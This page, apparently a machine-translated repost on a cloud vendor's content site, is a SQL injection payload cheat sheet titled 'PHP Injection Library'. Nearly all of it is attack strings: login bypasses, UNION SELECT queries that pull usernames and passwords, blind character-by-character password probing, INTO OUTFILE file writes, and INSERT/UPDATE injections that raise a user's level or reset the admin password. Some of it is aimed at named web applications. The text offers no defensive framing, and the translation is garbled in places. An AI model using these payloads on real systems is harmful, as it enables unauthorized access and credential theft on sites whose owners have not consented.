PHP Injection Library

Source: Internet
Author: User
Tags mysql ord create database


' Or 1=1
' or ' 1=1
'/*
'%23
' and password= ' Mypass
Id=-1 Union Select 1,1,1
Id=-1 Union Select char (), char (), char (97)
Id=1 Union select 1,1,1 from members
Id=1 Union select 1,1,1 from admin
Id=1 Union select 1,1,1 from user
Userid=1 and Password=mypass
Userid=1 and Mid (password,3,1) =char (112)
Userid=1 and Mid (password,4,1) =char (97)
and Ord (Mid (password,3,1)) >111 (Ord function is very good, can return to the plastic)
' and length (password) = ' 6 (Probe password length)
' and Left (password,1) = ' m
' and Left (password,2) = ' my
.............................. By analogy
' Union select 1,username,password from user/*
' Union select 1,username,password from user/*
= ' Union select 1,username,password from user/* (can be 1 or = after directly with)
99999 ' Union select 1,username,password from user/*
' Into outfile ' c:/file.txt (export file)
= ' or 1=1 into outfile ' C:/file.txt
1 ' union select 1,username,password from user into outfile ' c:/user.txt
SELECT Password from admins WHERE login= ' John ' into DumpFile '/path/to/site/file.txt '
Id= ' Union select 1,username,password from user into outfile
Id=-1 Union Select 1,database (), version () (Flexible application query)
Common query test statements,
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE ' uuu ' = ' UUU '
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL (NULL)
SELECT * FROM table WHERE ISNULL (COT (0))
SELECT * FROM table WHERE 1 was not NULL
SELECT * FROM table WHERE null is NULL
SELECT * FROM Table WHERE 2 BETWEEN 1 and 3
SELECT * FROM table WHERE ' B ' BETWEEN ' A ' and ' C '
SELECT * FROM Table WHERE 2 in (0,1,2)
SELECT * FROM table WHERE case is 1>0 THEN 1 end

For example: Night Cat Download System version 1.0
Id=1 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1
id=10000 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 and groupid=1
Union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 (replace, find password)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,1,1)) =49 (verify first-digit password)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,2,1)) =50 (second place)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,3,1)) =51
..................................................................

For example 2: Gray trajectory Transformation ID for testing (meteor)
Union%20 (Select%20allowsmilies,public,userid, ' 0000-0-0 ', User (), version ()%20from%20calendar_events%20where% 20eventid%20=%2013)%20order%20by%20eventdate
Union%20 (Select%20allowsmilies,public,userid, ' 0000-0-0 ', Pass (), version ()%20from%20calendar_events%20where% 20eventid%20=%2010)%20order%20by%20eventdate
To construct a statement:
Select Allowsmilies,public,userid,eventdate,event,subject from calendar_events WHERE EventID = 1 Union (select 1,1,1,1,1 , 1,1 from user where userid=1)
Select Allowsmilies,public,userid,eventdate,event,subject from calendar_events WHERE EventID = 1 Union (select 1,1,1,1, Username,password from user where userid=1)
Union%20 (select%201,0,2, ' 1999-01-01 ', ' a ', password%20from%20user%20where%20userid%20=%205)%20order%20by% 20eventdate
Union%20 (select%201,0,12695, ' 1999-01-01 ', ' a ', password%20from%20user%20where%20userid=13465)%20order%20by% 20eventdate
Union%20 (select%201,0,12695, ' 1999-01-01 ', ' a ', userid%20from%20user%20where%20username= ' Sandflee ')%20order%20by% 20eventdate (check the ID of the sand)

(SELECT A from table_name WHERE a=10 and B=1 order by a LIMIT 10)
SELECT * FROM article WHERE articleid= ' $id ' UNION SELECT * from ... (Fields and databases are in the same situation, can be submitted directly)
SELECT * FROM article WHERE articleid= ' $id ' UNION select 1,1,1,1,1,1,1 ... (Under different circumstances)

Special skills: In forms, search engines and other places to write:
“___”
“.__ ”
“%
% ' ORDER by articleid/*
% ' ORDER by articleid#
__ ' ORDER BY articleid/*
__ ' ORDER BY articleid#

$command = "dir c:\"; system ($command);
SELECT * from article WHERE articleid= ' $id '
SELECT * from article WHERE articleid= $id
1 ' and 1=2 union SELECT * from user where userid=1/* sentence becomes
(SELECT * from article where articleid= ' 1 "and 1=2 Union SELECT * from user WHERE userid=1/* ')
1 and 1=2 Union SELECT * from user where userid=1

Statement form: Create a library, insert:
CREATE DATABASE ' injection '
CREATE TABLE ' user ' (
' userid ' int (one) not NULL auto_increment,
' username ' varchar not NULL default ',
' Password ' varchar not NULL default ',
PRIMARY KEY (' userid ')
) ;
INSERT into ' user ' VALUES (1, ' Swap ', ' mypass ');


is inserted as a registered User:
INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $PASSW Ord ', ' $homepage ', ' 1 ');
INSERT into membres (login,password,nom,email,userlevel) VALUES (' $login ', ' $pass ', ' $nom ', ' $email ', ' 1 ');
INSERT into membres (login,password,nom,email,userlevel) VALUES (', ', ', ', ', ', ', ', ', ' 3 ') # ', ' 1 ')
INSERT into membres SET login= ' $login ', password= ' $pass ', nom= ' $nom ', email= ' $email ';
INSERT into membres SET login= ', password= ', nom= ', userlevel= ' 3 ', email= '
' inserts into membres VALUES (' $id ', ' $login ', ' $pass ', ' $nom ', ' $email ', ' 1 ');

Update user set password= ' $password ', homepage= ' $homepage ' WHERE id= ' $id '
UPDATE user set password= ' MD5 (mypass) ' W Here username= ' admin ' #) ', homepage= ' $homepage ' WHERE id= ' $id '
' UPDATE membres SET password= ' $pass ', nom= ' $nom ', Email= ' $email ' WHERE id= ' $id ';
Update membres set password= ' [Pass] ', nom= ', userlevel= ' 3 ', email= ' WHERE id= ' [id] '
UPDATE news SET Votes=votes +1, score=score+ $note WHERE idnews= ' $id ';

Long function:
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
For example:
UPDATE article Set title= $title WHERE articleid=1 corresponding function
UPDATE article SET title=database () where id=1
#把当前数据库名更新到title字段
Upda TE article set Title=user () where id=1
#把当前 MySQL user name to update to Title field
Update article set Title=system_user () where id=1
Update #把当前 MySQL username to Title field
Update article SET title=session_user () WHERE id=1
#把当前 mysql user name to update to Title field
Updat E article SET title=current_user () WHERE id=1
#把当前会话被验证匹配的用户名更新到title字段

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "SELECT * from membres WHERE name is $search% ' order by name";
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name
SELECT uid from admins WHERE login= ' or ' a ' = ' a ' and password= ' or ' a ' = ' a ' (classic)
SELECT uid from admins WHERE login= ' OR admin_level=1# ' and password= '
SELECT * FROM table WHERE msg like '%hop '
SELECT uid from membres WHERE login= ' Bob ' and password like ' a% ' and password= '
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.